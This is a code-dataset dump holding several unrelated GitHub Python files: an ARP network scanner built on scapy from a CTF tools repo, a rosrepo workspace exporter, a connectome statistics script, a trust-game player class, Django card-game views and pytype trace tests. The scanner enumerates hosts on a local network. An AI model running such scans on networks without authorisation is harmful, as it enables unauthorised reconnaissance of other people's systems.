| seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
40057143195 | #!/usr/bin/env python3
import scapy.all as scapy
import argparse
from datetime import datetime
import sys
def ip():
parse = argparse.ArgumentParser()
parse.add_argument("-ip", dest="ip", help="Needs IP range /24")
parse.add_argument("-i", dest="interface", help='Needs interface')
parse.add_argument("-t", dest="time", help="Number of ARP scan rounds (default 5)")
options= parse.parse_args()
if not options.ip:
parse.error('>> Needs ip address. Use -h for further details.')
elif not options.interface:
parse.error('>> Needs interface. Use -h for further details')
else:
return options
def scan(ip,interface,timer=5):
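# run the ARP broadcast for 'timer' rounds, recording each responder's IP and MAC only once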
client_list=[]
while timer >0:
arp_request = scapy.ARP(pdst = ip)
broadcast= scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
ans = scapy.srp(arp_request_broadcast, timeout=1,iface=interface, verbose=False)[0]
for i in ans:
client_dic={'IP':i[1].psrc, 'MAC':i[1].hwsrc}
if client_dic not in client_list:
client_list.append(client_dic)
timer = timer -1
return client_list
def output(results_list):
print('','-'*100,'\n',"\t IP \t\t\tMac address",'\n','-'*100)
for i in results_list:
print('\t',i['IP'] + "\t\t" + i['MAC'])
options = ip()
print('\nScanning please wait:\n ')
start=datetime.now()
try:
if options.time:
scan_results=scan(options.ip, options.interface,int(options.time))
else:
scan_results=scan(options.ip, options.interface)
output(scan_results)
except KeyboardInterrupt:
print('User requested shut down:')
sys.exit()
stop=datetime.now()
duration= stop-start
print('-'*100,'\nScan Complete\n')
print('Scan duration: %s'%(duration))
| WMDA/ctf | tools/python_scripts/network_scanner.py | network_scanner.py | py | 1,853 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "scapy.all.ARP",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "scapy.all",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "scapy.all.Ether",
... |
22568917957 | from .workspace import get_workspace_location, get_workspace_state, resolve_this
from .cache import Cache
from .config import Config
from .resolver import find_dependees
from .ui import warning, fatal, show_conflicts
from .cmd_git import has_package_path, get_head_branch
from .util import iteritems, yaml_dump
from pygit2 import Repository
import os
def compute_git_subdir(name, used_paths):
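# append a numeric suffix ("name-2", "name-3", ...) until the directory name is not already in use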
index = 1
result = name
while result in used_paths:
index += 1
result = "%s-%d" % (name, index)
used_paths.add(result)
return result
def get_current_remote(path):
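# return (remote URL, tracked branch) for the repo at 'path'; falls back to the first remote and no branch if nothing is tracked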
repo = Repository(os.path.join(path, ".git"))
if not repo.remotes:
warning("no remote found for Git repository in %s\n" % path)
return None, None
head_branch = get_head_branch(repo)
tracking_branch = head_branch.upstream if head_branch else None
remote_name = tracking_branch.remote_name if tracking_branch else None
remote = repo.remotes[remote_name] if remote_name else repo.remotes[0]
url = remote.url
version = None
if tracking_branch:
b = tracking_branch.branch_name
if b.startswith(remote_name + "/"):
b = b[len(remote_name) + 1:]
version = b
return url, version
def run(args):
wsdir = get_workspace_location(args.workspace)
config = Config(wsdir)
cache = Cache(wsdir)
if args.offline is None:
args.offline = config.get("offline_mode", False)
if args.offline:
warning("offline mode. Run 'rosrepo config --online' to disable\n")
ws_state = get_workspace_state(wsdir, config, cache, offline_mode=args.offline)
if args.this:
args.packages = resolve_this(wsdir, ws_state)
if args.all:
args.packages = ws_state.ws_packages.keys()
if not args.packages:
args.packages = config.get("default_build", []) + config.get("pinned_build", [])
protocol = args.protocol or config.get("git_default_transport", "ssh")
depends, _, conflicts = find_dependees(args.packages, ws_state)
show_conflicts(conflicts)
if conflicts:
fatal("cannot resolve dependencies\n")
paths = set()
remote_projects = set()
for name, pkg in iteritems(depends):
if hasattr(pkg, "workspace_path") and pkg.workspace_path is not None:
paths.add(pkg.workspace_path)
elif name in ws_state.remote_packages:
remote_projects.add(pkg.project)
ws_projects = set([p for p in ws_state.ws_projects if has_package_path(p, paths)])
other_git = set([g for g in ws_state.other_git if has_package_path(g, paths)])
yaml = []
for prj in ws_projects:
url, version = get_current_remote(os.path.join(wsdir, "src", prj.workspace_path))
if args.protocol:
url = prj.url[args.protocol]
packages = {}
for p in prj.packages:
if p.manifest.name in depends.keys():
packages[p.manifest.name] = p.project_path or "."
meta = {"packages": packages}
d = {"local-name": prj.workspace_path, "uri": url, "meta": meta}
if version:
d["version"] = version
yaml.append({"git": d})
for p in other_git:
url, version = get_current_remote(os.path.join(wsdir, "src", p))
d = {"local-name": p, "uri": url}
if version:
d["version"] = version
yaml.append({"git": d})
for prj in remote_projects:
packages = {}
for p in prj.packages:
if p.manifest.name in depends.keys():
packages[p.manifest.name] = p.project_path or "."
meta = {"packages": packages}
d = {"local-name": compute_git_subdir(prj.server_path, paths), "uri": prj.url[protocol], "version": prj.master_branch, "meta": meta}
yaml.append({"git": d})
if yaml:
args.output.write(yaml_dump(yaml, encoding="UTF-8", default_flow_style=False))
| fkie/rosrepo | src/rosrepo/cmd_export.py | cmd_export.py | py | 3,924 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "pygit2.Repository",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "ui.warning",
"line_nu... |
40211358205 | #%% [markdown]
# ## Preliminaries
#%%
from pkg.utils import set_warnings
set_warnings()
import time
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from giskard.utils import get_random_seed
from myst_nb import glue as default_glue
from pkg.data import load_network_palette, load_node_palette, load_unmatched
from pkg.io import savefig
from pkg.perturb import (
add_edges,
remove_edges,
shuffle_edges,
add_edges_subgraph,
remove_edges_subgraph,
shuffle_edges_subgraph,
)
from pkg.plot import set_theme
from pkg.stats import degree_test, erdos_renyi_test, rdpg_test, stochastic_block_test
from pkg.utils import get_seeds
from tqdm import tqdm
DISPLAY_FIGS = True
FILENAME = "perturbations_unmatched_deep_dive"
def gluefig(name, fig, **kwargs):
savefig(name, foldername=FILENAME, **kwargs)
glue(name, fig, prefix="fig")
if not DISPLAY_FIGS:
plt.close()
def glue(name, var, prefix=None):
savename = f"{FILENAME}-{name}"
if prefix is not None:
savename = prefix + ":" + savename
default_glue(savename, var, display=False)
t0 = time.time()
set_theme()
rng = np.random.default_rng(8888)
network_palette, NETWORK_KEY = load_network_palette()
node_palette, NODE_KEY = load_node_palette()
neutral_color = sns.color_palette("Set2")[2]
GROUP_KEY = "simple_group"
left_adj, left_nodes = load_unmatched("left")
right_adj, right_nodes = load_unmatched("right")
left_labels = left_nodes[GROUP_KEY].values
right_labels = right_nodes[GROUP_KEY].values
left_nodes["inds"] = range(len(left_nodes))
right_nodes["inds"] = range(len(right_nodes))
seeds = get_seeds(left_nodes, right_nodes)
#%%
random_state = np.random.default_rng(8888)
adj = right_adj
nodes = right_nodes
labels1 = right_labels
labels2 = right_labels
n_sims = 1
effect_sizes = np.linspace(0, 3000, 30).astype(int)
seeds = (seeds[1], seeds[1])
n_components = 8
#%%
KCs_nodes = nodes[nodes["simple_group"] == "KCs"]["inds"]
def remove_edges_KCs_KCs(adjacency, **kwargs):
return remove_edges_subgraph(adjacency, KCs_nodes, KCs_nodes, **kwargs)
#%%
rows = []
tests = {
"ER": erdos_renyi_test,
"SBM": stochastic_block_test,
"Degree": degree_test,
# "RDPG": rdpg_test,
# "RDPG-n":rdpg_test,
}
test_options = {
"ER": [{}],
"SBM": [{"labels1": labels1, "labels2": labels2, "combine_method": "min"}],
"Degree": [{}],
# "RDPG": [{"n_components": n_components, "seeds": seeds, "normalize_nodes": False}],
# "RDPG-n": [{"n_components": n_components, "seeds": seeds, "normalize_nodes": True}],
}
perturbations = {
"Remove edges (global)": remove_edges,
r"Remove edges (KCs $\rightarrow$ KCs)": remove_edges_KCs_KCs
# "Add edges (global)": add_edges,
# "Shuffle edges (global)": shuffle_edges,
}
n_runs = len(tests) * n_sims * len(effect_sizes)
for perturbation_name, perturb in perturbations.items():
for effect_size in tqdm(effect_sizes):
for sim in range(n_sims):
currtime = time.time()
seed = get_random_seed(random_state)
perturb_adj = perturb(adj, effect_size=effect_size, random_seed=seed)
perturb_elapsed = time.time() - currtime
for test_name, test in tests.items():
option_sets = test_options[test_name]
for options in option_sets:
currtime = time.time()
stat, pvalue, other = test(adj, perturb_adj, **options)
test_elapsed = time.time() - currtime
if test_name == "SBM":
uncorrected_pvalues = other["uncorrected_pvalues"]
other["KCs_pvalues"] = uncorrected_pvalues.loc["KCs", "KCs"]
row = {
"stat": stat,
"pvalue": pvalue,
"test": test_name,
"perturbation": perturbation_name,
"effect_size": effect_size,
"sim": sim,
"perturb_elapsed": perturb_elapsed,
"test_elapsed": test_elapsed,
**options,
**other,
}
rows.append(row)
results = pd.DataFrame(rows)
#%%
def check_power(pvalues, alpha=0.05):
n_significant = (pvalues <= alpha).sum()
power = (n_significant) / (len(pvalues))
return power
power_results = (
results.groupby(["test", "perturbation", "effect_size"]).mean().reset_index()
)
power = (
results.groupby(["test", "perturbation", "effect_size"])["pvalue"]
.agg(check_power)
.reset_index()
)
power.rename(columns=dict(pvalue="power"), inplace=True)
power_results["power"] = power["power"]
results["power_indicator"] = (results["pvalue"] < 0.05).astype(float)
results["power_indicator"] = results["power_indicator"] + np.random.normal(
0, 0.0025, size=len(results)
)
# %%
grid = sns.FacetGrid(
results,
col="perturbation",
col_wrap=min(3, len(perturbations)),
sharex=False,
sharey=False,
hue="test",
height=6,
)
grid.map_dataframe(sns.lineplot, x="effect_size", y="power_indicator")
grid.add_legend(title="Test")
grid.set_ylabels(r"Empirical power ($\alpha = 0.05$)")
grid.set_xlabels("Effect size")
grid.set_titles("{col_name}")
gluefig("power", grid.figure)
# %%
grid = sns.FacetGrid(
results,
col="perturbation",
col_wrap=min(3, len(perturbations)),
sharex=False,
sharey=False,
hue="test",
height=6,
)
grid.map_dataframe(sns.lineplot, x="effect_size", y="pvalue")
grid.add_legend(title="Test")
grid.set_ylabels(r"p-value")
grid.set_xlabels("Effect size")
grid.set_titles("{col_name}")
gluefig("pvalues", grid.figure)
#%%
subresults = results[results["perturbation"] == r"Remove edges (KCs $\rightarrow$ KCs)"]
subresults = subresults[subresults["test"] == "SBM"].copy()
fig, ax = plt.subplots(1, 1, figsize=(8, 6))
sns.lineplot(
data=subresults,
x="effect_size",
y="KCs_pvalues",
ax=ax,
label=r"KCs $\rightarrow$ KCs",
)
mean_pvalues = []
all_pvalues = []
for i in range(len(subresults)):
row = subresults.iloc[i]
vals = row["uncorrected_pvalues"].values
mean = np.nanmean(vals)
mean_pvalues.append(mean)
for j, pvalue in enumerate(vals.ravel()):
all_pvalues.append(
{"effect_size": row["effect_size"], "pvalue": pvalue, "j": j}
)
all_pvalues = pd.DataFrame(all_pvalues)
subresults["mean_pvalues"] = mean_pvalues
sns.lineplot(
data=subresults, x="effect_size", y="mean_pvalues", ax=ax, label="Mean p-value"
)
ax.set(ylabel="p-value", xlabel="Effect size (# edges removed)")
sns.lineplot(data=subresults, x="effect_size", y="pvalue", label="Fisher's combined")
ax.set_title(r"Remove edges (KCs $\rightarrow$ KCs)")
gluefig("split_pvalues", fig)
| neurodata/bilateral-connectome | misc_scripts/perturbations_unmatched_deep_dive.py | perturbations_unmatched_deep_dive.py | py | 6,901 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "pkg.utils.set_warnings",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pkg.io.savefig",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.close",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "matplotl... |
6363206566 | from itertools import count
global_index = 1
global_bank_fee = 1
global_bank_win = 2
global_bank_lose = 3
class smartPlayer:
_ids = count(0)
def __init__(self, trustor_or_trustee, trust_coefficient, beta):
global global_bank_fee
global_bank_fee = beta
self.id = next(self._ids)
self.trustor = trustor_or_trustee
self.trustingCoefficient = trust_coefficient
self.memory = {}
self.currency = 0
def changeTrustStatus(self):
self.trustor = not self.trustor
def reciprocate(self, other):
alreadyIn = False
for key in self.memory.keys():
if key == other.id:
alreadyIn = True
if not alreadyIn:
self.memory[other.id] = self.trustingCoefficient
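# cooperate only if the remembered trust clears the fee-adjusted threshold; a declining trustor still pays the bank fee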
ans = self.memory[other.id] >= 0.66 * (1 + global_bank_fee)
if not ans and self.trustor:
self.currency -= global_bank_fee
return ans
def updateCurrency(self, win_lose):
if self.trustor:
if win_lose:
self.currency += global_bank_win
else:
self.currency -= global_bank_fee
else:
if win_lose:
self.currency += global_bank_win
else:
self.currency += global_bank_lose
def updateTrustStatus(self, other, result):
if result:
self.memory[other.id] *= self.trustingCoefficient
else:
self.memory[other.id] *= (1 - self.trustingCoefficient)
def memoryPrint(self):
repstr = []
for pid, mem in self.memory.items():
repstr.append("Player ID: " + str(pid) + ", Trusting Status: " + str(mem))
return repstr
def __repr__(self):
return "Player ID: " + str(self.id) + "\n" + "Currency: " + str(
self.currency) + "\n" + "Self trusting coefficient: " + str(self.trustingCoefficient) + "\n" + "Is truster? " + str(self.trustor)
def __str__(self):
trustorStr = "No"
if self.trustor:
trustorStr = "Yes"
return "Player ID: " + str(self.id) + ", Currency: {0}".format(self.currency) + ", Self trusting coefficient: {0}".format(self.trustingCoefficient) + ", Is truster? " + trustorStr + "\n"
| snirsh/TrustGame | SmartPlayer.py | SmartPlayer.py | py | 2,264 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "itertools.count",
"line_number": 10,
"usage_type": "call"
}
] |
7086566402 | from django.shortcuts import render,redirect
from adm.models import *
def ViewInicio(request):
listJogos = Jogo.objects.select_related('Vencedora','Perdedora').all()
context = {
"listJogos":listJogos,
}
return render(request,"inicio.html",context)
def ViewCadastro(request):
if request.method == "POST":
listPessoas = request.POST.getlist('Jogador[]', None)
x=0
objJogo = Jogo()
for pessoa in listPessoas:
objPessoa = Pessoa()
objPessoa.Nome = pessoa
objPessoa.save()
if (x%2) == 0:
objEquipe = Equipe()
objPessoaAux = objPessoa
objEquipe.Nome = objPessoa
objEquipe.save()
objEquipe.Pessoas.add(objPessoa)
else:
objEquipe.Nome = str(objPessoa) + ' e ' + str(objPessoaAux)
objEquipe.save()
objEquipe.Pessoas.add(objPessoa)
objJogo.Nome += objEquipe.Nome
objJogo.save()
objJogo.Equipes.add(objEquipe)
x+=1
return redirect("InicioJogo", objJogo.id)
context = {
"Nome_pagina": "Cadastrar Jogo"
}
return render(request,"cadastro.html", context )
def ViewInicioJogo(request,idJogo):
objJogo = Jogo.objects.select_related('Vencedora','Perdedora').get(pk=idJogo)
listEquipes = objJogo.Equipes.all()
if request.method == "POST":
try:
ObjPartida = Partida.objects.select_related('Vencedora','Perdedora','Jogo').get(Jogo=objJogo,Fim=False)
except:
ObjPartida = Partida()
ObjPartida.Jogo = objJogo
ObjPartida.save()
listRodada=[]
for index, PtsCanastra in enumerate(request.POST.getlist('PtsCanastra[]')):
obj = {
"PtsCanastra": PtsCanastra,
"QtdCartas" :request.POST.getlist("QtdCartas[]", None)[index],
"QtdRed" : request.POST.getlist("QtdRed[]", None)[index],
"QtdBlack" : request.POST.getlist("QtdBlack[]", None)[index],
"Morto" : request.POST.getlist("Morto[]", None)[index],
}
listRodada.append(obj)
EquipeSelecionada=0
MaiorPontuacao = 0
for rodada in listRodada:
ObjRodada = Rodada()
ObjRodada.Partida = ObjPartida
ObjRodada.Equipe = listEquipes[EquipeSelecionada]
ObjRodada.PontosCanastra = rodada["PtsCanastra"]
ObjRodada.QtdCartas = rodada["QtdCartas"]
ObjRodada.QtdRed = rodada["QtdRed"]
ObjRodada.QtdBlack = rodada["QtdBlack"]
ObjRodada.Morto = rodada["Morto"]
ObjRodada.TotalPontos = 0
if int(ObjRodada.PontosCanastra) < 100:
ObjRodada.TotalPontos = (((int(ObjRodada.PontosCanastra) + (int(ObjRodada.QtdCartas)*10)) - (100*int(ObjRodada.QtdRed))) - (int(ObjRodada.QtdBlack)*100))
else:
ObjRodada.TotalPontos = (((int(ObjRodada.PontosCanastra) + (int(ObjRodada.QtdCartas)*10)) + (100*int(ObjRodada.QtdRed))) - (int(ObjRodada.QtdBlack)*100))
print("confere morto")
print(ObjRodada.Morto)
if ObjRodada.Morto == 'False':
print(f" A equipe {ObjRodada.Equipe} não pegou o morto")
ObjRodada.TotalPontos -= 100
ObjRodada.save()
try:
listRodadas = Rodada.objects.select_related('Equipe','Partida').filter(Partida=ObjPartida,Equipe=listEquipes[EquipeSelecionada])
totalpontos = 0
for rodada in listRodadas:
totalpontos += rodada.TotalPontos
if totalpontos >= 3000:
if MaiorPontuacao == 0:
MaiorPontuacao = totalpontos
if MaiorPontuacao <= totalpontos:
ObjPartida.Vencedora = listEquipes[EquipeSelecionada]
ObjPartida.Fim = True
for eq in listEquipes:
if eq != listEquipes[EquipeSelecionada]:
ObjPartida.Perdedora = eq
ObjPartida.save()
except:
listRodadas = []
EquipeSelecionada+=1
#contabilizar quem ganhou mais partidas.
ListPartida = Partida.objects.select_related('Vencedora','Perdedora','Jogo').filter(Jogo=objJogo)
listEquipe1 = []
listEquipe2 = []
print("estou aqui")
for partida in ListPartida:
if partida.Vencedora:
if partida.Vencedora == listEquipes[0]:
listEquipe1.append(partida)
else:
listEquipe2.append(partida)
if len(listEquipe1)>len(listEquipe2):
print(f'{listEquipes[0]} vencedora')
objJogo.Vencedora = listEquipes[0]
objJogo.Perdedora = listEquipes[1]
elif len(listEquipe2)>len(listEquipe1):
print(f'{listEquipes[1]} vencedora')
objJogo.Vencedora = listEquipes[1]
objJogo.Perdedora = listEquipes[0]
else:
print("empate")
objJogo.Vencedora = None
objJogo.Perdedora = None
objJogo.save()
return redirect("Resultado" , objJogo.id)
context = {
"objJogo":objJogo,
"listEquipes":listEquipes,
}
return render(request,"inicio_jogo.html",context)
def ViewResultado(request,idJogo):
objJogo = Jogo.objects.select_related('Vencedora','Perdedora').get(pk=idJogo)
try:
ListPartidas = Partida.objects.select_related('Vencedora','Perdedora','Jogo').filter(Jogo=objJogo)
ListPartidasRodadas = []
for Objpartida in ListPartidas:
listRodadas = Rodada.objects.select_related('Equipe','Partida').filter(Partida=Objpartida)
obj = {
"ObjPartida" : Objpartida,
"QtdRodadas" : len(listRodadas)
}
ListPartidasRodadas.append(obj)
except Partida.DoesNotExist:
ListPartidasRodadas = []
context = {
"objJogo":objJogo,
'ListPartidasRodadas': ListPartidasRodadas
}
return render(request,"resultados.html",context)
def ViewInfo(request,idPartida,idJogo):
objJogo = Jogo.objects.select_related('Vencedora','Perdedora').get(pk=idJogo)
ObjPartida = Partida.objects.select_related('Vencedora','Perdedora','Jogo').get(pk=idPartida)
try:
ListRodada = Rodada.objects.select_related('Equipe','Partida').filter(Partida=ObjPartida)
except:
ListRodada = []
context = {
"ObjPartida":ObjPartida,
"ListRodada":ListRodada,
"objJogo":objJogo,
}
return render(request,"mais_informacoes.html",context)
| michel110299/Administrador_tranca | adm/views.py | views.py | py | 7,068 | python | pt | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.redirect",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
"line_number": 45,
"usage_type": "call"
},
{
"api_nam... |
28891628391 | """Tests for traces.traces."""
import ast
import collections
import sys
import textwrap
from pytype import config
from pytype.pytd import pytd
from pytype.pytd import pytd_utils
from pytype.tests import test_utils
from pytype.tools.traces import traces
import unittest
_PYVER = sys.version_info[:2]
_BINMOD_OP = "BINARY_OP" if _PYVER >= (3, 11) else "BINARY_MODULO"
_CALLFUNC_OP = "CALL" if _PYVER >= (3, 11) else "CALL_FUNCTION"
_CALLMETH_OP = "CALL" if _PYVER >= (3, 11) else "CALL_METHOD"
_FORMAT_OP = "FORMAT_VALUE" if _PYVER >= (3, 11) else "BINARY_MODULO"
class _NotImplementedVisitor(traces.MatchAstVisitor):
def visit_Module(self, node):
self.match(node)
class _TestVisitor(traces.MatchAstVisitor):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.traces_by_node_type = collections.defaultdict(list)
def generic_visit(self, node):
try:
matches = self.match(node)
except NotImplementedError:
return
self.traces_by_node_type[node.__class__].extend(matches)
class TraceTest(unittest.TestCase):
"""Tests for traces.trace."""
def test_traces(self):
src = traces.trace("")
trace, = src.traces[0 if _PYVER >= (3, 11) else 1]
self.assertEqual(trace.op, "LOAD_CONST")
self.assertIsNone(trace.symbol)
pyval, = trace.types
self.assertEqual(pyval.name, "builtins.NoneType")
self.assertEqual(pyval.cls.name, "builtins.NoneType")
def test_options(self):
src = traces.trace("", config.Options.create("rumpelstiltskin"))
self.assertEqual(src.filename, "rumpelstiltskin")
def test_external_type(self):
with test_utils.Tempdir() as d:
pyi_path = d.create_file("foo.pyi", "class Foo: ...")
imports_info = d.create_file("imports_info", f"foo {pyi_path}")
src = traces.trace(
"import foo\nx = foo.Foo()",
config.Options.create(imports_map=imports_info))
trace, = (x for x in src.traces[2] if x.op == "STORE_NAME")
pyval, = trace.types
self.assertEqual(pyval.name, "foo.Foo")
self.assertEqual(pyval.cls.name, "foo.Foo")
def test_py3_class(self):
src = traces.trace(textwrap.dedent("""
class Foo:
pass
""").lstrip())
trace, = (x for x in src.traces[1] if x.op == "LOAD_BUILD_CLASS")
pyval, = trace.types
self.assertEqual(pyval.name, "typing.Callable")
def test_unknown(self):
# pytype represents unannotated function parameters as unknowns. Make sure
# unknowns don't appear in the traced types.
src = traces.trace("def f(x): return x")
trace = next(x for x in src.traces[1] if x.op == "LOAD_FAST")
pyval, = trace.types
self.assertIsInstance(pyval, pytd.AnythingType)
class MatchAstTestCase(unittest.TestCase):
"""Base class for testing traces.MatchAstVisitor."""
def _parse(self, text, options=None):
text = textwrap.dedent(text).lstrip()
return ast.parse(text), traces.trace(text, options)
def _get_traces(self, text, node_type, options=None):
module, src = self._parse(text, options)
v = _TestVisitor(src, ast)
v.visit(module)
return v.traces_by_node_type[node_type]
def assertTracesEqual(self, actual_traces, expected_traces):
self.assertEqual(len(actual_traces), len(expected_traces))
for trace, expected_trace in zip(actual_traces, expected_traces):
loc, trace = trace
expected_loc, expected_op, expected_symbol, expected_annots = (
expected_trace)
self.assertEqual(loc, expected_loc)
self.assertEqual(trace.op, expected_op)
self.assertEqual(trace.symbol, expected_symbol)
self.assertEqual(len(trace.types), len(expected_annots))
for t, annot in zip(trace.types, expected_annots):
self.assertEqual(pytd_utils.Print(t), annot)
class MatchAstVisitorTest(MatchAstTestCase):
"""Tests for traces.MatchAstVisitor."""
def test_not_implemented(self):
module, src = self._parse("")
v = _NotImplementedVisitor(src, ast)
with self.assertRaises(NotImplementedError):
v.visit(module)
def test_import(self):
matches = self._get_traces("import os, sys as tzt", ast.Import)
self.assertTracesEqual(matches, [
((1, 7), "IMPORT_NAME", "os", ("module",)),
((1, 18), "STORE_NAME", "tzt", ("module",))])
def test_import_from(self):
matches = self._get_traces(
"from os import path as p, environ", ast.ImportFrom)
self.assertTracesEqual(matches, [
((1, 23), "STORE_NAME", "p", ("module",)),
((1, 26), "STORE_NAME", "environ", ("os._Environ[str]",))])
class MatchAttributeTest(MatchAstTestCase):
"""Tests for traces.MatchAstVisit.match_Attribute."""
def test_basic(self):
matches = self._get_traces("""
x = 0
print(x.real)
""", ast.Attribute)
self.assertTracesEqual(matches, [
((2, 8), "LOAD_ATTR", "real", ("int", "int"))])
def test_multi(self):
matches = self._get_traces("""
class Foo:
real = True
x = 0
(Foo.real, x.real)
""", ast.Attribute)
# The second attribute is at the wrong location due to limitations of
# source.Code.get_attr_location(), but we can at least test that we get the
# right number of traces with the right types.
self.assertTracesEqual(matches, [
((4, 5), "LOAD_ATTR", "real", ("Type[Foo]", "bool")),
((4, 5), "LOAD_ATTR", "real", ("int", "int"))])
def test_property(self):
matches = self._get_traces("""
class Foo:
@property
def x(self):
return 42
v = Foo().x
""", ast.Attribute)
self.assertTracesEqual(matches, [
((5, 10), "LOAD_ATTR", "x", ("Foo", "int"))])
class MatchNameTest(MatchAstTestCase):
"""Tests for traces.MatchAstVisitor.match_Name."""
def test_basic(self):
matches = self._get_traces("x = 42", ast.Name)
self.assertTracesEqual(matches, [((1, 0), "STORE_NAME", "x", ("int",))])
def test_multiline(self):
matches = self._get_traces("""
x = (1 +
2)
""", ast.Name)
self.assertTracesEqual(matches, [((1, 0), "STORE_NAME", "x", ("int",))])
def test_multiline_subscr(self):
matches = self._get_traces("""
x = [0]
x[0] = (1,
2)
""", ast.Name)
x_annot = "List[Union[int, Tuple[int, int]]]"
self.assertTracesEqual(matches, [((1, 0), "STORE_NAME", "x", (x_annot,)),
((2, 0), "LOAD_NAME", "x", (x_annot,))])
class MatchCallTest(MatchAstTestCase):
"""Tests for traces.MatchAstVisitor.match_Call."""
def test_basic(self):
matches = self._get_traces("""
def f(x):
return x + 1.0
f(42)
""", ast.Call)
self.assertTracesEqual(matches, [
((3, 0), _CALLFUNC_OP, "f", ("Callable[[Any], Any]", "float"))])
def test_chain(self):
matches = self._get_traces("""
class Foo:
def f(self, x):
return x
Foo().f(42)
""", ast.Call)
self.assertTracesEqual(matches, [
((4, 0), _CALLFUNC_OP, "Foo", ("Type[Foo]", "Foo")),
((4, 0), _CALLMETH_OP, "f", ("Callable[[Any], Any]", "int"))])
def test_multiple_bindings(self):
matches = self._get_traces("""
class Foo:
@staticmethod
def f(x):
return x
class Bar:
@staticmethod
def f(x):
return x + 1.0
f = Foo.f if __random__ else Bar.f
f(42)
""", ast.Call)
self.assertTracesEqual(matches, [
((10, 0), _CALLFUNC_OP, "f",
("Callable[[Any], Any]", "Union[int, float]"))])
def test_bad_call(self):
matches = self._get_traces("""
def f(): pass
f(42)
""", ast.Call)
self.assertTracesEqual(
matches, [((2, 0), _CALLFUNC_OP, "f", ("Callable[[], Any]", "Any"))])
def test_literal(self):
matches = self._get_traces("''.upper()", ast.Call)
self.assertTracesEqual(matches, [
((1, 0), _CALLMETH_OP, "upper", ("Callable[[], str]", "str"))])
def test_lookahead(self):
matches = self._get_traces("""
def f(x, y, z):
return x + y + z
f(
0,
1,
2,
)
""", ast.Call)
self.assertTracesEqual(matches, [
((3, 0), _CALLFUNC_OP, "f",
("Callable[[Any, Any, Any], Any]", "int"))])
class MatchConstantTest(MatchAstTestCase):
def test_num(self):
matches = self._get_traces("v = 42", ast.Constant)
self.assertTracesEqual(matches, [((1, 4), "LOAD_CONST", 42, ("int",))])
def test_str(self):
matches = self._get_traces("v = 'hello'", ast.Constant)
self.assertTracesEqual(matches, [((1, 4), "LOAD_CONST", "hello", ("str",))])
def test_unicode(self):
matches = self._get_traces("v = u'hello'", ast.Constant)
self.assertTracesEqual(matches, [((1, 4), "LOAD_CONST", "hello", ("str",))])
def test_bytes(self):
matches = self._get_traces("v = b'hello'", ast.Constant)
self.assertTracesEqual(
matches, [((1, 4), "LOAD_CONST", b"hello", ("bytes",))])
def test_bool(self):
matches = self._get_traces("v = True", ast.Constant)
self.assertTracesEqual(matches, [((1, 4), "LOAD_CONST", True, ("bool",))])
def test_ellipsis(self):
matches = self._get_traces("v = ...", ast.Constant)
self.assertTracesEqual(
matches, [((1, 4), "LOAD_CONST", Ellipsis, ("ellipsis",))])
class MatchSubscriptTest(MatchAstTestCase):
def test_index(self):
matches = self._get_traces("""
v = "hello"
print(v[0])
""", ast.Subscript)
self.assertTracesEqual(
matches, [((2, 6), "BINARY_SUBSCR", "__getitem__", ("str",))])
def test_simple_slice(self):
matches = self._get_traces("""
v = "hello"
print(v[:-1])
""", ast.Subscript)
self.assertTracesEqual(
matches, [((2, 6), "BINARY_SUBSCR", "__getitem__", ("str",))])
def test_complex_slice(self):
matches = self._get_traces("""
v = "hello"
print(v[0:4:2])
""", ast.Subscript)
self.assertTracesEqual(
matches, [((2, 6), "BINARY_SUBSCR", "__getitem__", ("str",))])
class MatchBinOpTest(MatchAstTestCase):
def test_modulo(self):
matches = self._get_traces("""
v = "hello %s"
print(v % "world")
""", ast.BinOp)
self.assertTracesEqual(matches, [((2, 6), _BINMOD_OP, "__mod__", ("str",))])
def test_modulo_multiline_string(self):
matches = self._get_traces("""
('%s'
'%s' %
('hello',
'world'))
""", ast.BinOp)
self.assertTracesEqual(matches, [((1, 1), _BINMOD_OP, "__mod__", ("str",))])
def test_format_multiline_string(self):
matches = self._get_traces("""
('%s'
'%s' %
(__any_object__,
__any_object__))
""", ast.BinOp)
self.assertTracesEqual(
matches, [((1, 1), _FORMAT_OP, "__mod__", ("str",))])
class MatchLambdaTest(MatchAstTestCase):
def test_basic(self):
matches = self._get_traces("lambda x: x.upper()", ast.Lambda)
sym = "<lambda>"
self.assertTracesEqual(
matches, [((1, 0), "MAKE_FUNCTION", sym, ("Callable[[Any], Any]",))])
def test_function_locals(self):
matches = self._get_traces("""
def f():
return lambda x: x.upper()
""", ast.Lambda)
sym = "f.<locals>.<lambda>"
self.assertTracesEqual(
matches, [((2, 9), "MAKE_FUNCTION", sym, ("Callable[[Any], Any]",))])
def test_multiple_functions(self):
matches = self._get_traces("""
def f():
return (w for w in range(3)), lambda x: x.upper(), lambda y, z: (y, z)
""", ast.Lambda)
sym = "f.<locals>.<lambda>"
self.assertTracesEqual(
matches, [
((2, 32), "MAKE_FUNCTION", sym, ("Callable[[Any], Any]",)),
((2, 53), "MAKE_FUNCTION", sym, ("Callable[[Any, Any], Any]",))])
if __name__ == "__main__":
unittest.main()
